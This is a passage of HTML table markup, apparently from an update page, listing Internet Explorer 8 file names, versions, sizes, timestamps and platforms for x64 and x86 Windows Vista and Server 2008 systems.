class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">164,352</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,489,920</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,493,504</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,062,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,062,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,538,560</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,539,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.19475</td><td class=\"sbody-td\">23,040</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">23,040</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">31,744</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,147,392</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:51</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">31,744</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,151,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.19475</td><td class=\"sbody-td\">459,776</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">459,776</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">252,416</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">252,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">56,832</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">56,832</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,019,904</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,019,904</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">742,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:41</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">742,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">22:12</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:41</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">12,288</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">22:12</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">12,288</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.19475</td><td class=\"sbody-td\">479,232</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:26</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">479,232</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">08:53</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">98,304</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">98,304</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">9,342,464</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:39</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">9,344,000</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:38</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">718,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">718,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">301,056</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">301,056</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">162,816</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">660,648</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:33</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:33</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:33</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:33</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">162,816</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">660,648</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">21:53</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">21:53</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">21:53</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">21:53</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">502,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">502,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">19:30</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">243,712</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:49</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">29-Jan-2013</td><td class=\"sbody-td\">21:51</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">243,712</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:48</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">2,357,760</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.19475</td><td class=\"sbody-td\">165,888</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,358,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.23532</td><td class=\"sbody-td\">165,888</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:49</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">72,192</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">77,312</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:40</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">72,192</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">77,312</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,028,096</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,028,096</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">12,510,208</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">219,136</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">10:46</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">12,512,768</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">219,136</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:44</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:18</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,212,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,215,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.19475</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:49</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">916,992</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:17</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:17</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.19475</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:50</td><td class=\"sbody-td\">x86</td></tr><tr 